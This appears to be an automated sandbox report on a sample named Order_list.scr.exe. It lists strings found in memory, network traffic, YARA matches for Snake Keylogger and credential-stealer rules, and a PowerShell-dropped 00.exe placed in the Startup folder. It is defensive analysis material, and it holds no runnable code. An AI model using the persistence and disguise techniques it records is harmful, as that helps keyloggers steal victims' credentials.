Source: Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: Order_list.scr.exe, 00000003.00000002.4141697018.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003379000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027E5000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000283B000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Order_list.scr.exe, 00000003.00000002.4141697018.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Order_list.scr.exe, 00000000.00000002.4164055265.0000000003732000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgX
Source: powershell.exe, 00000001.00000002.1709053274.0000000007410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000006.00000002.1852338401.00000000074C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microu
Source: svchost.exe, 00000004.00000002.3324839942.0000023A6F000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000004.00000003.1703151617.0000023A6F218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000004.00000003.1703151617.0000023A6F218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000004.00000003.1703151617.0000023A6F218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000004.00000003.1703151617.0000023A6F24D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.4.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000001.00000002.1706543723.0000000005A58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1841172457.0000000004B52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1852338401.00000000074C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000339D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002810000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: powershell.exe, 00000001.00000002.1700469608.00000000049F1000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1841172457.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000006.00000002.1841172457.0000000004B52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1852338401.00000000074C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Order_list.scr.exe, 00000000.00000002.4175150990.0000000005A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlit-itt
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000001.00000002.1700469608.00000000049F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1841172457.0000000004A01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000004.00000003.1703151617.0000023A6F2C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000004.00000003.1703151617.0000023A6F2C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000006.00000002.1841172457.0000000004B52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1852338401.00000000074C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1706543723.0000000005A58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000004.00000003.1703151617.0000023A6F2C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.4.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: Order_list.scr.exe, 00000003.00000002.4141697018.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000283B000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Order_list.scr.exe, 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003385000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: Order_list.scr.exe, 00000003.00000002.4141697018.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000283B000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Order_list.scr.exe.29590ec.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.Order_list.scr.exe.4d40000.5.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 5.2.00.exe.3a39840.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.00.exe.3a39840.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Order_list.scr.exe.4d40000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.Order_list.scr.exe.3668570.3.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.Order_list.scr.exe.29568ac.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 5.2.00.exe.3a18e10.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.00.exe.3a18e10.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.00.exe.3a18e10.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.00.exe.2c76d58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 5.2.00.exe.3a39840.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.00.exe.3a39840.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.00.exe.3a39840.3.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.00.exe.2c79598.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000005.00000002.4161249755.0000000003A34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.4170463364.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: Order_list.scr.exe PID: 3584, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Order_list.scr.exe PID: 3584, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: 00.exe PID: 7076, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 00.exe PID: 7076, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Order_list.scr.exe

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Jump to dropped file

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 0_2_0093D304	0_2_0093D304
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_01676108	3_2_01676108
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_0167C190	3_2_0167C190
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_0167F007	3_2_0167F007
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_0167B328	3_2_0167B328
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_0167C470	3_2_0167C470
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_0167C753	3_2_0167C753
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_01679858	3_2_01679858
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_01676880	3_2_01676880
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_0167BBD3	3_2_0167BBD3
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_0167CA33	3_2_0167CA33
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_01674AD9	3_2_01674AD9
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_0167BEB7	3_2_0167BEB7
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_0167E528	3_2_0167E528
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_0167E517	3_2_0167E517
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_0167B4F3	3_2_0167B4F3
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DAC9D8	3_2_05DAC9D8
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DABD38	3_2_05DABD38
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DAB0A0	3_2_05DAB0A0
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA7050	3_2_05DA7050
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DAA408	3_2_05DAA408
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DAD028	3_2_05DAD028
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DAC388	3_2_05DAC388
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DA8B58	3_2_05DA8B58
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DAB6E8	3_2_05DAB6E8
Source: C:\Users\user\Desktop\Order_list.scr.exe	Code function: 3_2_05DAAA58	3_2_05DAAA58
